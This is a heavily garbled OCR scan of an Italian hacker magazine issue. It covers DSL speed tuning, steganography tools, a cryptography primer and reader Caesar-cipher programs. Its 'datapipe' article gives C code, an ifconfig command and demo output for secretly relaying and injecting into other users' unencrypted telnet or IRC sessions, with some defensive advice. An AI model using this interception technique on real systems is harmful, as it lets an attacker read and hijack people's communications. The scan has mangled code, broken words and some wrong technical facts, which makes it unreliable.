processo in esecuzione che impegni la 
CPU. Così tutte le risorse de! computer 
sono dedicate al collegamento e non 
distratte a fare altre cose. 

Dovrebbe essere apparsa una fine- 
strella con un pulsante Start. Se ciò 

non avviene, è perché non abbiamo atti- 
vato l'interprete Java del browser, ma il 
rimedio lo troviamo a destra, sotto il link 



"the JAVA applets do not work". 
Premiamo il pulsante Start. Dopo qual- 
che manciata di secondi sì attiva il pul- 
sante Results, perché il test è finito. 



Premiamo, Results, e passiamo alla 
pagina dei risultati. 

Qui ci è chiesto di specificare qualche 
parametro, ovvero il tipo di linea che stia- 



lAttention Satellite Users: DO NOT USE THIS TOOL - instead read the Satellite User FAQ on 
the subjectof TWEAKING, also check out the Direcway Satellite Users Forum 



Tweak Tester II 



* Downloading file of size 1 46000: complete. 

*Analyzing now 

End ok- press Results butto n. 



Start 



Results 



Tweak Tester II - uses a small lOOk test file. 
Premium tweak tester, using large test file, available soon. 



• No JAVA APPLET 

dìsplayed? Please see FAQ 
entry 309: "the JAVA 
applets do not work" 



• BUSY?The tester is 
limited to 3 simultaneous 
tests at a tirine, it is also 
limited to 5 tests on one IP 
within a few hours. 
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La diagnosi in bella copia: 
è qualche parametro 
da sistemare. 
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À Il dottore del TCP: 
uà a sistemare alcuni 
registri di Windows. 



mo utilizzando, la velocità dichiarata dal 
produttore (da adsl in poi) oppure la velo- 
cità dichiarata del nostro modem (se stia- 
mo utilizzando una linea telefonica nor- 
male). Attenzione, la velocità va dichiara- 
ta in Kbit al secondo, quindi per una adsl 
a 640 KB scriveremo, appunto, 640. Poi 
il sistema operativo che stiamo utilizzan- 
do e infine il tipo di protocollo, che nella 
stragrande maggioranza dei casi è Nor- 
mal, ma che possiamo scegliere anche 
se usiamo qualcosa come ppp over 
ethernet e simili. 



La diagnosi 



In una bella tabella c'è scritto tutto 
quello che è bene conoscere per otti- 
mizzare la connessione. Va quasi tut- 
to bene, anzi, una faccina sorridente ci 



"'ìe che è un "good data stream" e quin- 
possiamo stare abbastanza tranquilli 
e la nostra rete funziona, il modem adsl 
Den regolato, i router fanno il loro dove- 
. Ma c'è un avviso di attenzione che 
riguarda i parametri interni al pc e un sug- 
gerimento per regolarli al meglio. 
Per la nostra connessione, il parametro 
RWIN, attualmente a 64240 come da 
impostazioni di fabbrica di WinXP, va 
messo tra 18980 e 51 100. Come? Sem- 
plice, scaricando l'apposita utility doctor 
TCP dal link in basso alla finestra: down- 
load/use DRTCR 



Carichiamo e attiviamo DRTCP. I 
parametri sono parecchi, ma cono- 
sciamo tutte le risposte. Con la tabel- 
la apparsa a video nel browser, regolia- 
mo i parametri come ci è stato suggeri- 
to. In particolare nel nostro caso potre- 
mo lasciare tutto così com'è, tranne 
RWIN. Lo mettiamo a 51 1 00. 
Rifacciamo la prova: good! Ora è tutto a 
posto e il nostro PC può andare a tutta 
velocità! 



Come facciamo a 
capire a quanto viaggiano i nostri dati sul- 
la linea? Ci vuole un test apposito, che tro- 
viamo allo stesso indirizzo, in una pagina 
differente: http://www.dslreports. com/stest. 
In realtà qui troviamo un elenco di centi- 
naia di possibili posti tramite i quali la nostra 
linea può essere verificata. Per noi italiani 
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A Rubiamo regolato tutto? 
nilora ci siamo. 



NETWORKING 



vi consigliamo per la sua semplicità il test 
fatto da un server di Roma, all'indirizzo 
http://151.99.la9.53/luxa/luxatv/ 
company/connessiorìe.htm e quello di un 
server a Madrid all'indirizzo http://www.dien- 
te33.es.tdatacenter.com/ La conclusione 
potrebbe deluderci, ma ricordiamoci che le 
misure sono medie e non dipendono sola- 
mente dalla nostra linea, ma anche da 
quanto trafficato è il percorso che la rete 
sceglie per noi in quel preciso momento. Il 
test è quindi da provare a diverse ore del 
giorno e per più volte. Saremo sorpresi di 
vedere come possono cambiare i risultati. 

ControlBut 
controlbus@softhome.net 




connessione, seconda R 



Telefònica Data 



Medida de velocidad 



RDSI64kbps 
ROSI 12S kbps 

ADSL STANDARD 256 kbps 

ADSL CLASS 512 kbps 



| ADSL AVANZADA 1000 kbps 

ADSL PREMIUM 2000kbps 



En la gràfica superior puede ver su velocidad actual en rojo y la cornparación con la velocidad de pico màxima que 
se puede obtener con otras conexiónes. En la tabla infenor puede ver los datos utilizados para obtener la grafica. 



Tienipo Imi ini 


23/3/104-18:56:44.765 


Tiempo Final: 


23/3/104-18:56:46.808 


Tiempo empiendo: 


2.043 segundos 


Byte* Recibidos: 


409600 


Velocidad Kbps 


1,603.92 Kbps 


Velocidad KBytes/sec 


200.49 KBytes/sec 



NOTA IMPORTANTE 

£1 reitdimiento de iuta conexìón niutca es del 100%. Hay que le nei en cuenta que en eslos tipos de conexiónes (Modem analogico, 
RDSI,ADSL)seiitìliiandirersospTOtocolos(PPP ) TCP/IP)o 1 ueocupananchodebanda(enn«un2%yun20%dell00% total, 
segùn e J tipo de conexión y protocolo utilizano), con lo que se reduce el ancho de banda uni para la descarga de datos. El resultado 
que se muestra en el test se corresponde con el ancho de banda udì, esto es, equivale a la velocidad de transièreitcia de 
informaci!) ti, y no a la velocidad de acceso. Adicionabnente, existen otros iàctores no medibles que pueden contribuir a re due ir la 
velocidad de la conexión, conto son la congestion en la red, ìnter&rencias electromagnéticas, eie, que también influyen el 
resultado final. 

Si quiere repetir la medida pulse "Aceptar" 



Si ciuiere saber corno se ha realizado la medición 1 



A ...e secondo Madrid 



V 



DOTTORE, IL TCP STA MALE! 



uando usiamo DRTCP, andiamo a toccare ali 
di Windows. Ma cosa vogliono dire? Ecco, in breve. 

TCP Receive Window o RWIN: è la regolazione più importante. Lasciar- 
lo al valore che ha normalmente è come avere una cannuccia piccola 
in un frappé denso: facciamo una gran fatica. 
Se usiamo una cannuccia più grande, fino a che c'è frappé riusciamo 
ad assorbirlo più velocemente. 

Verso la fine, però, quando il frappé diventa un po' liquido, non c'è più 
differenza perché il frappé si disperde (cominciamo a perdere pacchet- 
ti di dati). Il trucco allora è quello di trovare la cannuccia giusta per la 
quantità di dati che arrivano, abbastanza ampia all'inizio ma che non 

Ierda dati alla fine. Questo è quello che fa RWIN. 
a formula per ottenere RWIN è questa: latenza (tempo di ping 
ledio in millisecondi x 1,5) x velocità teorica della nostra linea 
tutto diviso 8. 



e che tendono a perde- 
re pacchetti, ritrasmettendo solamente le parti perse. E' già su on in 
Win98/98SE/ME/2K/XP e su N/A in Win95/NT. 

Path MTU Discovery: MTU, maximum transmission unit, dipende dal- 
la linea che abbiamo (modem = 576, adsl 1492-1500). E' la dimen- 
sione dei pacchetti ricevuti. Il valore più alto da usare è 1500, tranne 
nel caso utilizziamo una connessigne^PPPoE che deve stare sotto 1492. 
Per default è on in Win98/98SE/Mr:/2K/XP/NT, e N/A in Win95. 

Black Hole Detection: per scoprire se qualche router nel WEB non 
usa la MTU impostata. Normalmente off. 

Max. Duplicate ACKs: migliora la velocità di ritrasmissione dei pac- 
chetti persi. Impostato su 3 (blank) in Win98/98SE/ME, su 2 in 
WinNT/2K/XP, e N/A in Wm95. 




Windows Scaling: 65535 è il valore più alto di RWIN, ma se attivia- 
mo Windows Scaling possiamo superarlo. Si deve però avere instal- 
lata la patch vtcp.386 (tranne che su WinME/2K/XP). Tranquilli, lascia- 
mo tutto su off. 

Time Stamping: se la latenza del collegamento varia parecchio, tipi- 
camente se abbiamo un collegamento Internet satellitare, allora vale 
la pena fare qualche esperimento variando il Time Stamping. Altrimen- 
ti lasciamolo su off. 



TTL: Time To Live è il numero di hops che faranno in pacchetti prima 
di morire. Vale 32 (blank) in Win95, e vale 128 in 
Win98/98SE/ME/2K/XP. 

Adapter settings: qui è dove si colloca MTU. Scegliamo dalla list 
nostra scheda di rete. Se MTU è 1500, si può lasciare in bianco. 

ICS Settings: è il parametro uguale a MTU se si sta utilizzando un pc che 
condivide una connessione Internet di un altro pc a cui è collegato. 
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a parola steganograf ia deriva 
dal greco e significa scrittu- 
ra coperta, nascosta. È l'arte 
di nascondere l'esistenza di un 
messaggio, diversamente dalla 
crittografia, che ne nasconde il 
contenuto. Il Web è un campo dì applica- 
zione ideale per la steganografia perché 
è pieno di informazioni inutili e rumore di 
fondo, all'interno del quale è facile 
nascondere un messaggio. In sostanza, 
steganografare significa celare dati all'in- 
terno di altri dati che ne rendono inavver- 
tibile l'esistenza all'osservatore casuale. 
I dati vengono solitamente nascosti all'in- 
terno di file grafici, musicali oppure ese- 
guibili. Come sempre, gli unici program- 
mi validi di steganografia sono quelli di 
cui è verificabile il codice sorgente. 

Grafica 



jphs 

http://www.searchlores.org/zipped/jphs_O 
5.zip Composto da JPHIDE.EXE. che 




nasconde i dati in un file JPEG, i 
JPSEEK.EXE, che li recupera. 

contraband 

http://www.searchlores.org/zipped/con- 
trabd.exe Nasconde i dati in una imma- 
gine in formato BMP. 

Hide and Seek 

http://www.searchlores.org/zipped/hdsk4 
1.zip Steganografia con file GIF. 

Musica 

MP3Stego 

http://www.searchlores.org/zipped/MP3St 
ego_1_1_16.zip Nasconde i dati in un 
file musicale MP3. 

Si potrebbe anche usare per autentica- 
re un file musicale, dal momento che l'u- 
nico attacco possibile consiste nel 
distruggere le informazioni nascoste tra- 
mite decompressione e ricompressione 
del file, ma la qualità del brano si abbas- 
sa notevolmente. 



L'immagine 

a destra differisce 

da quella 

di sinistra 

perché contiene 

un messaggio, 

ma è impassibile 

accorgersene 

casualmente 



MP3StegoGUI 

http://www.searchlores.org/zipped/MP3St 
ego_GUI.zip. Interfaccia grafica per 
MP3Stego. 



Eseguibil 



Hydan 

http://www.crazyboy.com/hydan/ 
Il programma sfrutta ridondanze nel set 
di istruzioni dei processori Ì386 e defini- 
sce set di istruzioni equivalenti dal pun- 
to di vista funzionale, per poi codificare 
l'informazione in codice macchina usan- 
do le istruzioni appropriate da ciascun 
set. La dimensione dell'eseguibile rima- 
ne identica e il messaggio nascosto vie- 
ne anche cifrato con blowfish. Anche 
Hydan può essere impiegato per auten- 
ticare codice. 

Gli spazi bianc hi 

Snow 

http://www.darkside.com.au/snow/ 
Nasconde messaggi in testo ASCII 
aggiungendo spazi bianchi alla fine di ogni 
riga, li messaggio può essere cifrato. 'tÉ 



p 25 www.hackerjournal.it 



Some funziona il dirottamento tei iati attraverso 
la rete e come possiamo difenderci 



n Datapjpe è un software 
che ci consente di ritrasmet- 
tere dati, in maniera più o 
meno fedele, verso la pro- 
pria o un'altra macchina * 
' contesto che ci accingiai 
descrivere si può essere piloti di un data- 
pipe oppure subirne le conseguenze; nel- 
l'ultimo caso è un dovere quanto un bene 
conoscere i rischi a cui si va incontro. 



Roba da dirott atori 

Questo strumento, in taluni casi, è 
un possibile sostituto dei moderni 
programmi di hijacking. Ai tempi in cui 
era ignota la possibilità di effettuare il 
vero e proprio "dirottamento" di una con- 
nessione in atto (hijacking) o era impos- 
sibile addirittura praticarla (limitazioni di 
alcuni sistemi operativi), il sottoscritto 
pensò a una alternativa. L'obiettivo era 
dimostrare che, essendo amministratori 
di sistema, vi era la possibilità, oltre che 
di sniffare (leggere il traffico), anche di 
prendere il controllo della connessione 
stabilita da un utente per mezzo di alcu- 



ni software non facenti uso di i 
cifratura, quali ad esempio telnet, rei 
eggdrop e così via, senza che egli se ne 
accorgesse. La soluzione al problema è 
molto semplice e per certi versi ovvia; è 
infatti sufficiente realizzare un so" 
che effettui ritrasmissione dati, co 
giunta della possibilità di inserire ul. 
ri informazioni a nostro piacimentc 
flusso di trasmissione originale. 
Di seguito sono riportate le parti principa- 
li del codice risolutivo scritto in C, che è 
comunque possibile scaricare nella sua 
versione integrale presso il sito 
http://www.rosiello.org. Non vi è af 
soluzione generale al problema, ove _ 
volessero utilizzare connessioni non cifra- 
te. Ricordiamo che se un amministrato- 



IL PROGRAMMA 



Questa implementazione è adottata secondo le specifiche dei sistemi Unix (Linux, FreeBSO, Solaris, IRIX, Darwin eccetera) 

int mainUnt argc, char *argu[]) 



if (arac != 3) 
{ 

printf("usage: 7oS <seruer> <port>\n", arguto]); 

enit(1); 
} 
SSDCk = socket(flF_INET, SOCK_STRERM, IPPROTO_TCP); 

i = i; 

setsnrkopKssock, SOL_SOCKET, SO_REUSERDDR, (char *}&i, sizeof ( 

ssin.sin_family = RF_INET; 

ssin.sin_addr.s_addr = INRDDR_RNV; 

ssin.sin_port = htons(atoi(argu[2])); 

bincKssock, (struct sockaddr *)&ssin, sizeof(ssin)); 

listen(ssock, 5); 

ujhile (1) /* listenloopV 



)); 



i = sizeof(fsin); 

fsock = acceptissock, (struct sockaddr *)frfsin, &i); 

printff'connection tram %s\n", inet_ntaa(fsin.sin_addr)); 

printfC'connecting to 7c.s..An", arguii]); 

csock = SDCket(RF_INET, SOCK_STRERM, IPPROTD_TCP); 

csin.sin_family = RF_INET; 

memcpy(G-csin.sìn_addr.s_addr, he->h_addr, sizeof (he->h_addr)); 

csin.sin_port - htons(atoi(argu[2])); 

sleep(2); 

if (connect(csock, (struct sockaddr *)&csin, sizeof (csin)) j= D) 



} 

printfC'connected, entering pìpemode...\n"); 

wtiile (1) /* pipelnop*/ 
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re di sistema effettuasse tali operazioni a 
nostro discapito sarebbe perseguibile 
penalmente, ma sappiamo benissimo 
che coi tempi che corrono è salutare 
tenere gli occhi ben aperti! 



Come usarlo 



nciando il programma ci mettere- 
mo in ascolto locale sulla porta desi- 
derata. Ma questo meccanismo non ci 

tnsente ancora di concludere nulla, in 
quanto rimane il fatto che l'utente vorrà 
collegarsi a un ipotetico host che sarà 
chiaramente diverso dall'indirizzo locale 
della nostra macchina! Per risolvere que- 
sto inconveniente sarà sufficiente aggiun- 
gere a una nostra scheda di rete il nume- 
ro IP dell'host con cui l'utente vuole stabi- 



/sbin/ifconfig eth0:1 up<IP dì host> 
assegnerà l'ip del seruer al localhost ! 



Evidentemente per gli utenti locali l'host 
diventa la nostra macchina ed ogni tenta- 
tivo di collegarsi ad esso si riduce ad un 
tentativo di collegarsi in localhost. 
Vediamo nella figura la situazione attuale 
(per semplicità mi collegherò a 127.0.0.1) 
Non ci resta altro che leggere e inviare 
comandi a nostro piacimento, proprio 
come se fossero digitati dal vero utente. 



Sessione Modifica Vjì 



Segnalihn Impostazioni Aiuto 



ilo coati* ./ctaekpips 127.0.0.1 g* 



Ilisteuing on port 6667... 
conucction fross 127.0.0.1 
connecting to 127.0.0.1... 
tonn«tcd. cntcring pipcmodc 



ca Visualizza Segnati!» impoMazionI Aiuto 



[roat^roaiello root]# te 
Trying 127.0.0.1.. . 
Coiinecietl to 127-0.0.1. 
Escape character is '* } ' 

cidu cune Stai? 
Si tutto bene qui 



v> ciao come stair 

;Da qui leggo e posso inviare quello che mi aggrada! 

IL 'utente non può leggermi ma il sei 



;V> Si lutto bene qui 



▲ Dirottamento in corso! Due utenti chat tana nella finesh 
di destra e un terzo utente può leggere tutto guanto si 
dicano, senza essere notato. 



Conclusioni 



Le possibilità offerteci da un sempli- 
ce datapipe, come abbiamo visto, 
sono notevoli. Ed è un programma che 
a prima vista risulta essere del tutto inno- 
cuo. Mediante la tecnica esposta, che va 
solo ed esclusivamente adottata e 
attuata sulle proprie macchine, nel 
rispetto della legge, è possibile pilota- 
re una connessione ma è anche vero il 
contrario, cioè essere vittima di un'azio- 
ne di questo tipo. 

Quali rimedi è possibile adottare?lntan- 
to, per applicare questa metodologia 
bisogna essere l'amministratore di siste- 
ma. Altrimenti non potremo assegnare 
un indirizzo alla scheda di rete. Se non 



siamo amministratori, proponiamo due 
soluzioni: 



O Controllare gli indirizzi assegnati 
alle schede di rete per verificare la 
situazione, ove consentito; eventualmen- 
te realizzare un traceroute per determi- 
nare il percorso dei pacchetti. 
© Impiegare programmi che utilizzino 
sistemi di cifratura, come ssh simili. 

Chiaramente la soluzione numero 
due, oltre a essere più generale, è 

anche la migliore, in quanto l'attaccante 
leggerà ben poco di "comprensibile" lun- 
go la connessione e non potrà comun- 
que inviare comandi veritieri. 



igela@rosiello.org 



FD_ZERO(Gfds); 
FD_SET(0, Gfds); 
FD_SET(csock, Gfds); 
FD_SET(fsack, Gfds); 
tu.tu_SBC = 5; 
tu.tu_usec = 1; 

select(FD_SETSIZE, G-fds, NULL, NULL, Giù); 

if (FD_l SSETfcsock, Gf ds)) /* pass data seruer->uictim and attac- 
ker */ 
{ 
ì = read(csack, buf, sizeof(buf)); 

writeffsock, buf, i); 
ujrite(0, buf, i); 



= read(fsock, buf, sizeof (buf )); 

write(csock, buf, i); 
printf("U> "); 
fflush(D); 

ujrite(D, buf, i); 

if (FD_ISSET(0, Gfds)) /* inject data from stdin */ 

read(Q, buf, sizeof (buf)); 
Luritefcsock, buf, i); 



{ 



} 



if (FD_ISSET(fsock, Gfds)) /* pass data uìctim->seruer and attacker */ } 

{ 



return D; 
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a crittografia è l'arte di 
elaborare algoritmi per 
cifrare un messaggio 
rendendolo incompren- 
sibile a tutti tranne al 
destinatario. 
In questo articolo spiegheremo le diver- 
se possibilità di cifratura dei nostri file: 
ali alaoritmi a chiave nubblica. nuelli a 



chiave privata, le funzioni di Hash e i 
ne PGR 



Gli algoritmi 

a chiaue pubblica 



Nel caso in cui un documento venga 
cifrato a chiave pubblica, né il mitten- 
te né il destinatario devono essere a 
conoscenza della stessa chiave (uno dei 
problemi centrali della crittografia non è 
rendere illeggibili i messaggi, ma comu- 
nicare in modo sicuro la chiave di deco- 
difica al destinatario). Mittente e destina- 
tario usano una coppia di chiavi ciascu- 
no: una pubblica e una privata. 
Più la chiave è lunga, più è difficile indo- 
vinarla; con un algoritmo simmetrico con 
chiave da 80 bit l'attaccante, con la sola 
forza bruta, deve contare al massimo 
2 A 80 chiavi prima di beccare la chiave 
giusta. 

Invece, con un algoritmo a chiave pub- 
blica a 512 bit, l'attaccante deve fattoriz- 
zare un numero composto codificato in 
512 bit, ossia fino a 155 cifre decimali. 
Il lavoro dell'attaccante è profondamen- 
te differente a seconda dell'algoritmo uti- 
lizzato. Gli algoritmi più importanti a chia- 
ve pubblica sono RSA, ELGAMAL, LUC 
e Cifratura Probabilistica. 



Fu sviluppato nel 1977 da Ron Rivest, 
Adi Shamir e Léonard Adleman. È basa- 
to sull'analisi della fattorizzazione. 
Solitamente viene abbinato ad altri r 
ritmi a chiave privata come DES, il < 
le è molto più veloce. 
RSA fornisce dimensioni di chiavi 




^io della crittografia 
moderna e la nascita di DES. 



. ELGHMHL 

Si basa sull'analisi dei logaritmi discreti. 
Da recenti studi si è evidenziato come 
RSA e ELGAMAL offrano una sicurezza 
simile per chiavi differenti. 
Di fatto però ELGAMAL è più lento rispet- 
to a RSA. 

.LUC 

Sviluppato da un gruppo di ricercatori 
australiani e neozelandesi in base alle 
sequenze di Lucas, simili a quelle più 
semplici di Fibonacci, in cui ogni nume- 
ro deriva da una operazione compiuta 
sui numeri precedenti (esempio: 1, 1,2, 
3, 5, 8, 13, 21 ... in cui ogni numero è la 
somma dei due numeri prima). 



. Cifratura Probab.. 

Approccio differente alla cifratura fonda- 
to da Goldwasser e Micali, che confonde 
un intercettato re indesiderato originan- 
do più testi cifrati da un singolo messag- 
gio di partenza. 



Gli algoritmi 
a chiaue priuata 



Gli algoritmi a chiave privata si diffe- 
renziano da quelli pubblici perché sia 
il mittente, sia il destinatario del mes- 
saggio devono conoscere la stessa 
chiave segreta. Esistono diversi siste- 
mi, tra cui DES (e le sue varianti), IDEA, 
RC5 e BLOWFISH. 

.DES 

Lalgoritmo DES (Data Encryption Stan- 
dard) nacque per un'esigenza della NSA 
(National Security Agency) la quale, circa 
35 anni fa, indisse un concorso per avere 
un algoritmo di cifratura avanzato. 
Vinsero i tecnici IBM e, dal 1977 fino ai tem- 




▲ Nel giugno 1997 viene 
violato per la prima volta 
il codice DES. il tramonto 
non di un mito, 
ma di una tradizione. 
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L'ABC della CRITTDBRAFIA! 





pi nostri, DES è stato uno dei migliori siste- 
mi per la crittografia dei dati (solo da poco 
abbiamo scoperto le sue debolezze). 

DES appartiene alla famiglia di algo- 

f"tmi simmetrici e funziona sostituen- 
o e spostando caratteri. Il blocco dati 
! elabora volta per volta è di 64 bit, 
indi 8 byte. Anche la chiave è compo- 
sta da 64 bit, ma solo 56 di questi sono 
utilizzati. I bit rimanenti vengono utilizza- 
ti per controlli di parità. Per migliorare 
DES è poi nato l'algoritmo 3DES (Triple 
DES), che riutilizza DES cifrando tre vol- 
te consecutivamente il messaggio con 
diverse chiavi. 3DES usa tre chiavi a 56 
bit, per un totale di 162 di chiave. 3DES 
è chiaramente più lento di DES e, seb- 
bene sia più protetto contro un attacco 
di forza bruta, non offre la sicurezza di 
altri algoritmi a chiavi molto lunghe. 




A TriplB DES consiste 
praticamente ne ti 'applicare 
tre unite DES al messaggio. 
Più robusto di prima, ma la 
crittografia forte 
è un'altra cosa. 

. IDEH 

Fu ideato nel 1990 presso il politecnico 
ETH di Zurigo da James L. Massey e 



Xuejia Lai. Usa chiavi a 128 bit e lo stes- 
so algoritmo sia per cifrare che per deci- 
frare. È sotto brevetto fino al 2007. 

jflH 



.BLOLDFISH 

Fu inventato nel 1 993 da Bruce Schneier 
e proposto come sostituto di DES e 
IDEA, essendo libero da brevetti. Fun- 
ziona con chiave variabile da 32 bit fino 



RC5 è un cifrario a blocchi semplice e 
veloce, progettato da Ronald Rivest nel 
1 995, nel Laboratory of Computer Scien- 
ce del MIT. 

Lalgoritmo è adatto per l'implementazio- 
ne hardware e per quella software e si 
basa sulla lunghezza della parola, il 
numero di iterazioni e la lunghezza del- 
la chiave privata. 



Funzioni HHSH 



Le funzioni hash o one-way hash tra- 
sformano un documento di lunghez- 
za arbitraria in un codice di lunghez- 
za fissa. La stringa viene definita valo- 
re di hash o checksum. 
La caratteristica di queste funzioni è ia 
loro difficile invertibilità: dato un valore 
di hash è difficilissimo risalire al mes- 
saggio che lo ha generato; è inoltre mol- 
to difficile produrre un messaggio che 
fornisca un valore di hash predetermi- 
nato. La lunghezza dei valori di hash 
varia a seconda degli algoritmi. Attual- 
mente sono utilizzati soprattutto i 
seguenti algoritmi: MD2, MD4, MD5, 
SHAeSHA-1. 



M02, MD4 e M D5 

Vennero sviluppati da Rivest nel 1990; 

lavorano prendendo un documento di 
lunghezza arbitraria e creando il riassun- 
to del documento in chiave a 128 bit. 
Maggiori informazioni si possono trova- 
re nelle RFC 1319-1321 
(http://www.faqs.org/rfcs/rfc1 31 9.html, 
1320.htmle1321.html). 



SHH-1 

Il software di file sharing Bit Torrent 
utilizza suddetto algoritmo per la veri- 
fica dei file. SHA sta per Secure Hash 
Algorithm. Fu sviluppato dai ricercatori del 
NIST come specificato nel SHS (Secure 
Hash Standard) e fa parte del progetto 
Capstone. Prende un documento (la cui 
lunghezza deve essere inferiore a 2 A 64 
bit) e produce una chiave a 1 60 bit. 



PGP 

PGP è l'acronimo di Pretty Good Pri- 
vacy, programma scritto da Philip Zim- 
mermann. La peculiarità di questo pro- 
gramma è la possibilità di produrre chia- 
vi robuste con algoritmi a chiave pubbli- 
ca e privata. Usa RSA per codificare una 
chiave segreta che viene usata a sua vol- 
ta per cifrare il messaggio. 
PGP è freeware e si può trovare presso 
http://www.pgpi.org/. 

GiDuanni Federico_aka_root313_ 

http://uiujiu.giiujare.Drg 

giofederico@hackerjuurnal.it 
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Era tacile? tra diffìcile? 

È stalo appassionante. > 

le soluzioni al cifrario di Cesare 

sono veramente piovute in redazione 

a centinaia. Grazie a tutta Ci slamo trovati 

sommersi di risposte al cynerenigma messo 

a line del numero 47. Pubblichiamo alcuni tra 

quelli che hanno risposto In tempo, per problemi 

di spazio siamo costretti a mettere il codice 

delle altre soluzioni nella Secret ione 



La soluzione? 

Semplice. La frase nascosta 
è bella e pronta all'indirizzo 
http://it.wikioedia.ora/wiki/Cifr 



ano di Cesare. 



Finiscono le sfide? 

Per niente, abbiamo una 
nuova sfida anche in questo 
numero. In ultima pagina! 



PROGRAMMA 
CHE TI PASSA 

C'è chi ha risolto 
il Cyberenigma 
scrivendo qualche riga 
di codice. Eccoli! 



(BV nHZRREL) 



<?php 

// caratteri dalla a alla z da asci! 97 
// caratteri dall H alla Z da ascii 65 
// carattere ' .,' restano uguali 
// carattere \ lascia invariato il successiuo (di soli- 
ta usato h ' e ") 

// $argu[l] contiene il nome del file da esaminare 
// $argu[2] contiene il numero di transazione, se 
si prouano tutte le rotazioni... 
// $argu[5] contiene il nome del file di output 

// Se in $argu[1] abbiamo ? o nessun parametro 

mostriamo la sintassi... 

if ($argu[ll=="?" or $argu[1]=="") 

echo "Sintassi di rot.phpAn W; 

echo " php rot.php nomefìlelnput [nume- 
roScorrimenti [nomefileOutput]]\n\n"; 

echo " se numeroScorrimenti = terran- 
no prouati tutti e 25 scorrimentiW; 

echo " rispetto le lettere 

dell'alfabeto. Sn"; 

enit; 



// linea di separazione 

$linea=" 

\n\n"; 

$nomeìn=$argu[l]; 

$rot=$argu[2J; 

$nomeout=$argu[3]; 

// soId se c'è' un output apriamo il file... 
if (Snomeout) $fout=fopen($nomeout,"uj"); 

// se non e' specificato il numero di scorrimenti (0) 
allora prouiamoli tutti... 
if(!$rot ||$rot==0) 
{ 

$conta=1; 

$fine=26; 



$conta=$rot; 
$fine=$rot; 
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// apriamo il file in input 
$fin=fopen($nomein,"r"); 

if ($fin) 

{ // finché non finisce... 

ujhile(!feof($fin)) 
{ // acquisiamo 

carattere per carattere 

$ci=fgetc($fin); 
// nel caso in cui 
il carattere sia tra 'a' e 'z' 

if ($ci> = 'a' && 
$ci<='z') 

/ / 

prendiamo il codice ascia del carattere (con 
ord) 

ti sic- 
come le lettere minuscole uanno da 97 a 122 

// sot- 
traendo 97 arriuiamo a ualori compresi tra 
De 25 

/ / 

aumentiamolo del scorrimento e mediante 
modulo 26 li facciamo restare tra D e 25 

// un 
+97 li fa ritornare nel campo dei caratteri 
minuscoli e con chr li trasf. in caratteri 

$co=chr((ord($cì)-97+$conta) % 26 + 97); 

// nel caso in cui 
il carattere sia tra 'FI' e '2' 

else if ($ci> = 'R' 
B&$cK='Z') 

$co=chr((ord($ci)-65+$conta) % 26 + 65); 

// se una \ eli- 



miniamola 

elseif ($cì=='\V) 

$co="; 
// negli altri casi 
teniamo i caratteri come sono (uale per la 
punteggiatura e le uocali accentate) 
else 

$co=$ci; 

// uisualizziamo 
su schermo ed euentualmente su file 
echo $co; 
if ($fout) fiori- 
te($fout,$co); 

} 

// chiusura del file in 

fclase($fin); 



ingresso. 



ta 



else 

echo "File non trouato!"; 
// incremento della chiane di con- 



$conta++; 

ti linea separatrice 

echo Slinea; 

if ($fout) fwrite($fout,$linea); 
// cicla per tutti gli scorrimenti o sdIo per 
uno se la chiaue uiene specificata. 
} uihile($conta<$fine); 
// chiusura del file di output se specificato, 
if (Sfout) fclose($fout); 



?> 



un PRDGRninmn in e 

(BY TRDGD) 

maini) 

{ 

int carat; 

fp = fopen("Crypt.tHt","r"); 
fg = fapen("Decrypt.tHt","uj"); 

UJhìle( (carat = fgetc(fp)) != EOF ) 

if( (carat >= 65) && (carat <= 9D) ) 

{ 

carat = carat + 13; 

ujhilel carat > 9D ) 

{ 

carat = carat - 26; 



else if( (carat >= 97) && (carat <= 122) ) 

{ 

carat = carat + 13; 

uihile( carat > 122) 

{ 

carat = carat - 26; 



fputefearat, fg); 

fclose(fp); 
fclose(fg); 



iH» 



Ecco i nomi (e non solo) 
di quanti hanno accettato 
la sfida del cyberenigma! 



Il primo che ha risposto. 



mirici the ■ 



Alessandro Del Gaudio 

-={p3v3}=- 

u-t-o 

Sephiroth87 

LEGRAND 

Virgilio Claudio Campobasso 

BlackDragoon 

Domenico 

-=[M37h0d]=- 

FEDERICO da UDINE 

Pog8 

Digital Lupin 

Harlok 

Ogmios 

G10nZ 

[C3nZlnO] da Cosenza 



Marco Orlandi 

yayo 

3Mentina 

Torculus 

gufino2 

forconiarrostiti 

Enrico Sunseri 

tantrax 

Tux_katamail 

Giancarlo Di Martino 

Dark_Sun 

devilangel666 

NASTYBIT (Elvio G.) 

Nicola Gullo 

_alex88_ 

davide_861 

criptocoscio74 

Hunt3r 

Den2k 

Daniele Zannoni 

Giancarlo Di Martino 

m3rcuti0 

Isa 

filippo 

toniack 

Bennny 

VEEJAYetornado89 

Zipang 

Nicolò Silva, aka blackphoenix 

@AlieN@ 

simonide 

ciollu 

scopel emanuele 

beppe caruso 

Surf3r 

A Stefy A 



Domenico Tria 

gotenks 

ETABETA 

Coky 

DonPiccì 



. L' avvocato Simone, che ci 
segnala 

http://digilander.libero.it/salsi/crit- 
tografia/chiavi-simmetriche.html; 
. Fox91 , un giovane hacker di 
"quasi 13 anni" di Volano (Trento) 
che ha risolto i! cyberenigma "tut- 
to a mano" perché "più diverten- 
te"; 

. Luigi: "ho 14 anni" 
. LiquidSnake: "Per decifrare il 
testo (dopo innumerevoli prove) 
ho notato che nell'alfabeto riporta- 
to, la lettera "L" veniva sostituita 
dalle lettera "Y"..." 
. n13t75ch3: ...credo sia corret- 
to.. .almeno spero...!!! 
. LordDrago (XbeqQentb): "fvrgr 
tenaqv" 
. LordFly 



. Pit: "Purtroppo non ho tempo di 
scriverla tutta xché ho da andare a 
lezione e ne ho già persa una per 
decifrare!" 



. biBAni88: "l'ho decrittato durante 
l'ora di latino, proprio mentre la 
prof mi elogiava dicendo ke ero 
sempre attento alle lezioni e stu- 
diavo sempre :-D" 
. Fulvio Mhu Calzamiglia: "...utiliz- 
zando le pause del lavoro..." 



. Naqern: "Il problema è ke tradur- 
re l'intero testo parola per parola 
sarebbe lunghissimo, e non ho le 
basi per fare un programmino (per 
quanto semplice) in C che lo faccia 
per me. Quindi spero ke vi fidiate 
di meekemi pubblichiate tra 
coloro che hanno risolto il Cybere- 
nigma" 

. lce_CuBe: "potrei andare avanti 
ma sono le 5:23 e la notte è fini- 
ta..." 

. Sagitter: "purtroppo non ho tem- 
po di dedicarmi a tutte le vostre 
belle storie, ho tradotto solo poche 
